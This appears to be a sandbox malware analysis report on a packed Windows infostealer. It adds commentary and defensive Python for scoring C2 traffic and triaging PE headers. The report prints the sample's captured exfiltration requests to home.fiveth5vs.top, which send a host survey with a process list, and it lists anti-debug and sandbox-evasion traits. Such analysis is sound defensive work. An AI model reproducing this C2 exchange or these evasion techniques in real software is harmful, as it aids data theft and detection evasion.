Windows Analysis Report
JbN2WYseAr.exe

Overview

General Information

Sample name: JbN2WYseAr.exe (renamed because the original name is a hash value)
Original sample name: 3168cdb0691e91fc0109d3d5e854b7b1.exe
Analysis ID: 1582704
MD5: 3168cdb0691e91fc0109d3d5e854b7b1
SHA1: b29e09e7a8545b5471027b9b2a7e893e5266d727
SHA256: 4ba12035398519562e56cf4b0a0a2e9dae54ec66ee9d54fc474d3e5fff8bef4f
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • JbN2WYseAr.exe (PID: 8044, cmdline: "C:\Users\user\Desktop\JbN2WYseAr.exe", MD5: 3168CDB0691E91FC0109D3D5E854B7B1)
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: JbN2WYseAr.exe | Avira: detected
Source: JbN2WYseAr.exe | ReversingLabs: Detection: 60%
Source: JbN2WYseAr.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: JbN2WYseAr.exe | Joe Sandbox ML: detected
Source: JbN2WYseAr.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_0048A5B0
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0048A7F0 (reported 2 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0048A7F0 (reported 2 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0048A7F0 (reported 2 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0048B560
The immediate 0x424D53FF, stored little-endian, is the byte sequence FF 53 4D 42 ("\xFFSMB"), the protocol identifier that opens every SMB1 packet header; writing it at [reg+04h] is what the signature "Contains functionality to create an SMB header" is matching on. Since libcurl documentation URLs (curl.se/docs/...) are found in memory, this is plausibly the SMB client that ships inside libcurl rather than purpose-written SMB code, but the report does not establish which.
Source: JbN2WYseAr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_0042255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_004229FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1 | Host: home.fiveth5vs.top | Accept: */* | Content-Type: application/json | Content-Length: 442563 | Data Ascii (decoded from the report's raw hex dump, which is truncated):
{ "ip": "8.46.123.189", "current_time": "8468739163627434110", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, ...
Source: global traffic | HTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1 | Host: home.fiveth5vs.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1 | Host: home.fiveth5vs.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_004EA8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1 | Host: home.fiveth5vs.top | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5vs.top
Source: unknown | HTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1 | Host: home.fiveth5vs.top | Accept: */* | Content-Type: application/json | Content-Length: 442563 (same host-survey body as the POST listed above)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Tue, 31 Dec 2024 08:51:19 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Tue, 31 Dec 2024 08:51:21 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Ascii: (identical to the previous 404 response body)
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
Source: JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
Source: JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4
Source: JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
Source: JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737lse
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: JbN2WYseAr.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
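The requests to home.fiveth5vs.top above are the whole C2 exchange the sandbox captured: a JSON host survey (public IP learned from httpbin.org, processor and RAM counts, drive usage, display resolution, recent-file count, full process list) POSTed to a fixed path, a GET of the same path with ?argument=0, and a 31-byte POST reporting { "id1": "0", "data": "Done1" }, none of them carrying a User-Agent header. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses raw HTTP requests constructed to match the observed ones, scores each on those traits, turns a "Data Raw" hex dump back into text, and decodes the 10-digit suffix of the C2 path as a Unix timestamp. That the suffix is a timestamp is an assumption about the path format (it decodes to 2024-12-30 05:48:57 UTC, the day before the analysis); the sample bodies are shortened stand-ins for the 442563-byte survey.

```python
import json
import re
from datetime import datetime, timezone

# Keys of the host-survey JSON seen in the report's first POST body.
FINGERPRINT_KEYS = {
    "ip", "current_time", "Num_processor", "Num_ram", "drivers",
    "Num_displays", "resolution_x", "resolution_y", "recent_files", "processes",
}
# Observed C2 path shape: 20 ASCII letters then 10 digits (/KhxTILlSHLygUudVWlQk1735537737).
# Treating the digits as a Unix timestamp is an assumption, not something the report states.
C2_PATH = re.compile(r"^/([A-Za-z]{20})(\d{10})$")


def build_request(method, path, host, body=None, user_agent=None):
    """Constructed helper: assemble a raw HTTP/1.1 request shaped like the report's."""
    headers = [f"Host: {host}", "Accept: */*"]
    if user_agent:
        headers.append(f"User-Agent: {user_agent}")
    if body is not None:
        headers += ["Content-Type: application/json", f"Content-Length: {len(body)}"]
    return f"{method} {path} HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n" + (body or "")


def parse_request(raw):
    """Split a raw request into method, path, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def score_request(raw):
    """Return the indicators a request matches, in a fixed order."""
    req = parse_request(raw)
    hits = []
    if "user-agent" not in req["headers"]:
        hits.append("no_user_agent")          # "HTTP GET or POST without a user agent"
    is_json_post = (req["method"] == "POST"
                    and req["headers"].get("content-type", "").startswith("application/json"))
    if is_json_post:
        try:
            doc = json.loads(req["body"])
        except ValueError:
            doc = None
        if isinstance(doc, dict):
            if len(FINGERPRINT_KEYS & set(doc)) >= 3:
                hits.append("host_fingerprint_json")   # system survey leaving the host
            if set(doc) == {"id1", "data"}:
                hits.append("task_result_json")        # { "id1": "0", "data": "Done1" }
    if C2_PATH.match(req["path"]):
        hits.append("c2_path_pattern")
    return hits


def path_timestamp(path):
    """Decode the 10-digit path suffix as a UTC Unix timestamp (assumed format); None if no match."""
    m = C2_PATH.match(path)
    return datetime.fromtimestamp(int(m.group(2)), tz=timezone.utc) if m else None


def decode_data_raw(hex_dump):
    """Turn a report 'Data Raw' hex dump back into text (non-ASCII bytes kept as Latin-1)."""
    return bytes.fromhex(hex_dump.replace(" ", "")).decode("latin-1")


# Constructed sample traffic modelled on the report; the survey body is shortened.
SURVEY_BODY = (
    '{ "ip": "8.46.123.189", "current_time": "8468739163627434110", '
    '"Num_processor": 4, "Num_ram": 7, '
    '"drivers": [ { "name": "C:\\\\", "all": 223.0, "free": 168.0 } ], '
    '"processes": [ { "name": "lsass.exe", "pid": 628 } ] }'
)
SAMPLE_REQUESTS = [
    build_request("GET", "/ip", "httpbin.org"),
    build_request("POST", "/KhxTILlSHLygUudVWlQk1735537737", "home.fiveth5vs.top", SURVEY_BODY),
    build_request("POST", "/KhxTILlSHLygUudVWlQk1735537737", "home.fiveth5vs.top",
                  '{ "id1": "0", "data": "Done1" }'),
    build_request("GET", "/index.html", "example.org", user_agent="Mozilla/5.0"),  # benign control
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(raw.split("\r\n", 1)[0], "->", score_request(raw) or "clean")
    print(path_timestamp("/KhxTILlSHLygUudVWlQk1735537737"))
```

The survey-key check is the durable part of this: the host and the 30-character path will differ per build, but the schema of the JSON survey tends to survive across samples from the same family, so it is the better thing to hunt on in proxy logs.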

System Summary

Source: JbN2WYseAr.exe | Static PE information: section name: (empty)
Source: JbN2WYseAr.exe | Static PE information: section name: .idata
Source: JbN2WYseAr.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174A967 (reported 12 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_01749E6B (reported 12 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_01749EEA (reported 12 times)
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code functions (one entry per address in the report):
  0_2_004305B0, 0_2_00436FA0, 0_2_0045F100, 0_2_004EB180, 0_2_007AE050, 0_2_007AA000, 0_2_004F00E0, 0_2_00486210,
  0_2_004EC320, 0_2_00774410, 0_2_004F0420, 0_2_0042E620, 0_2_004EC770, 0_2_00786730, 0_2_0048A7F0, 0_2_007A4780,
  0_2_00434940, 0_2_0042A960, 0_2_004DC900, 0_2_005F6AC0, 0_2_006DAAC0, 0_2_005B4B60, 0_2_006DAB2C, 0_2_00798BF0,
  0_2_0042CBB0, 0_2_007ACC90, 0_2_007A4D40, 0_2_005E0D80, 0_2_0079CD80, 0_2_0073AE30, 0_2_00444F70, 0_2_004EEF90,
  0_2_004E8F90, 0_2_00772F90, 0_2_004310E6, 0_2_0078D430, 0_2_007935B0, 0_2_007B17A0, 0_2_004D9880, 0_2_00779920
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 004275A0 appears 584 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 00464F40 appears 293 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 005D7220 appears 96 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 00465340 appears 41 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 00464FD0 appears 220 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 005044A0 appears 58 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 004650A0 appears 83 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 0043CD40 appears 68 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 0042CAA0 appears 62 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 004271E0 appears 43 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 0043CCD0 appears 53 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 005FCBC0 appears 90 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: String function: 004273F0 appears 102 times
Source: JbN2WYseAr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: JbN2WYseAr.exe | Static PE information: Section: ptayyfsq ZLIB complexity 0.9943666559188511
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_0042255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_2_004229FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 4 times)
Source: JbN2WYseAr.exe | ReversingLabs: Detection: 60%
Source: JbN2WYseAr.exe | Virustotal: Detection: 56%
Source: JbN2WYseAr.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: JbN2WYseAr.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Sections loaded, in order: apphelp.dll, winmm.dll, iphlpapi.dll, cryptbase.dll, cryptsp.dll, rsaenh.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, winrnr.dll, uxtheme.dll, windows.storage.dll, wldp.dll, windowscodecs.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, kernel.appcore.dll
Source: JbN2WYseAr.exe | Static file information: File size 4512256 > 1048576
Source: JbN2WYseAr.exe | Static PE information: Raw size of the unnamed section is bigger than: 0x100000 < 0x289a00
Source: JbN2WYseAr.exe | Static PE information: Raw size of ptayyfsq is bigger than: 0x100000 < 0x1c0400

Data Obfuscation

Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Unpacked PE file: 0.2.JbN2WYseAr.exe.420000.0.unpack
  unpacked: (unnamed):EW; .rsrc:W; .idata :W; (unnamed):EW; ptayyfsq:EW; htlvnmme:EW; .taggant:EW
  vs original: (unnamed):ER; .rsrc:W; .idata :W; (unnamed):EW; ptayyfsq:EW; htlvnmme:EW; .taggant:EW
  The two lists differ only in the first, unnamed section: execute/read (ER) in the original, execute/write (EW) once unpacked. The packer stub writes the real code into a section that was not writable on disk, which is the change "Detected unpacking (changes PE section rights)" refers to.
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
  A section named .taggant is normally appended by the IEEE Taggant System that some commercial packers support; an entry point there, in the last section rather than in .text, is what "Entry point lies outside standard sections" flags.
Source: JbN2WYseAr.exe | Static PE information: real checksum: 0x4586d9 should be: 0x4535bc
Source: JbN2WYseAr.exe | Static PE information: section names: (empty), .idata, (empty), ptayyfsq, htlvnmme, .taggant
  The two empty names (and the trailing space in ".idata ") are what "PE file contains section with special chars" refers to; ptayyfsq and htlvnmme are the non-standard names.
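The static findings above (checksum mismatch, entry point in .taggant, empty and random section names, every code section mapped write+execute, a section with ZLIB complexity 0.99) are the usual marks of a packed executable, and they can all be re-checked from the PE headers without a sandbox. The Python below is an added example, not Joe Sandbox code and not derived from the sample: it parses just enough of a PE32 to recompute the header checksum with the imagehlp algorithm, find which section holds the entry point, and inspect section names, characteristics and byte entropy, and it runs against two images it constructs in memory, one benign and one whose layout mimics this report (empty and random names, entry point in .taggant, W+X everywhere, a stored checksum set to the report's 0x4586d9). Shannon entropy stands in for Joe Sandbox's ZLIB-complexity metric; the 7.0 threshold and the section-name lists are the author's assumptions.

```python
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FILE_ALIGN, OPT_SIZE = 0x200, 0xE0          # PE32 optional header is 0xE0 bytes
# Assumed name lists: where a linker normally places the entry point, and names a normal build emits.
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}
KNOWN_SECTIONS = STANDARD_CODE_SECTIONS | {".rdata", ".data", ".idata", ".edata", ".rsrc",
                                           ".reloc", ".bss", ".tls", ".pdata", ".CRT"}


def _align(n, a):
    return (n + a - 1) // a * a


def build_pe(sections, entry_rva, checksum=0):
    """Constructed minimal PE32 image for the demo (not the report's sample): DOS header,
    PE signature, COFF header, optional header, section table, then each section's raw data."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, OPT_SIZE, 0x0102)
    hdr_size = _align(0x40 + 4 + 20 + OPT_SIZE + 40 * len(sections), FILE_ALIGN)
    opt = bytearray(OPT_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)                                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                                # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, FILE_ALIGN)           # ImageBase, alignments
    struct.pack_into("<II", opt, 60, hdr_size, checksum)                      # SizeOfHeaders, CheckSum
    table, body, raw_ptr = b"", b"", hdr_size
    for name, rva, data, chars in sections:
        raw = data.ljust(_align(len(data), FILE_ALIGN), b"\0")
        table += struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"),
                             len(data), rva, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body, raw_ptr = body + raw, raw_ptr + len(raw)
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(hdr_size, b"\0") + body


def parse_pe(data):
    """Read just enough of the headers for triage: entry RVA, checksum field, section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw": data[rawptr:rawptr + rawsize], "chars": chars})
    return {"entry": struct.unpack_from("<I", data, opt + 16)[0], "checksum_offset": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": sections}


def pe_checksum(data, checksum_offset):
    """PE header checksum, same folding algorithm imagehlp's CheckSumMappedFile uses."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:                 # the CheckSum field itself is skipped
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stamp_checksum(data):
    """Write the correct checksum into the image (what a linker with /RELEASE does)."""
    pe, out = parse_pe(data), bytearray(data)
    struct.pack_into("<I", out, pe["checksum_offset"], pe_checksum(data, pe["checksum_offset"]))
    return bytes(out)


def shannon_entropy(buf):
    n = len(buf)
    return -sum(buf.count(b) / n * math.log2(buf.count(b) / n) for b in set(buf)) if n else 0.0


def triage(data):
    """Static checks mirroring the report's PE signatures; returns a list of finding tags."""
    pe, findings = parse_pe(data), []
    if pe["stored_checksum"] not in (0, pe_checksum(data, pe["checksum_offset"])):
        findings.append("invalid_checksum")
    ep = next((s for s in pe["sections"]
               if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    if ep is None or ep["name"] not in STANDARD_CODE_SECTIONS:
        findings.append("entry_point_outside_standard_sections")
    for s in pe["sections"]:
        tag = repr(s["name"])
        if not s["name"] or not all(32 < ord(c) < 127 for c in s["name"]):
            findings.append("section_name_special_chars:" + tag)   # empty, spaces, non-printables
        elif s["name"] not in KNOWN_SECTIONS:
            findings.append("non_standard_section_name:" + tag)
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("writable_and_executable:" + tag)
        if shannon_entropy(s["raw"]) > 7.0:                           # packed/encrypted payload candidate
            findings.append("high_entropy_section:" + tag)
    return findings


def benign_sample():
    return stamp_checksum(build_pe([
        (".text", 0x1000, b"\xC3" * 64, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".data", 0x2000, b"\0" * 64, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ], entry_rva=0x1000))


def packed_sample():
    """Layout modelled on the report: empty name, random name, entry in .taggant, W+X, wrong checksum."""
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    return build_pe([
        ("", 0x1000, b"\0" * 16, rwx),
        ("ptayyfsq", 0x2000, bytes(range(256)) * 4, rwx),   # entropy 8.0 stand-in for packed data
        (".taggant", 0x3000, b"\x90" * 32, rwx),
    ], entry_rva=0x3000, checksum=0x4586D9)
```

On a real file, triage(open(path, "rb").read()) is enough. A stored checksum of 0 is accepted because most non-driver binaries are never checksummed at all, so only a non-zero mismatch like the report's 0x4586d9 against 0x4535bc carries signal: it means the header was edited after the checksum was written, which is what packers and patchers do.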
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174BB76 push eax; retf 0_3_0174BC51
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174A55E push edi; iretd 0_3_0174A56B
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174A53B push ebx; iretd 0_3_0174A54B
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_01748F1B push edi; iretd 0_3_01748F33
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_017473DA push ss; iretd 0_3_017473DB
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_017471CA push esp; iretd 0_3_017471CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0173E992 push ebp; retf 0_3_0173E993
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174619D push ecx; iretd 0_3_0174619B
Source: C:\Users\user\Desktop\JbN2WYseAr.exe | Code function: 0_3_0174619D push ebx; iretd 0_3_017461AB
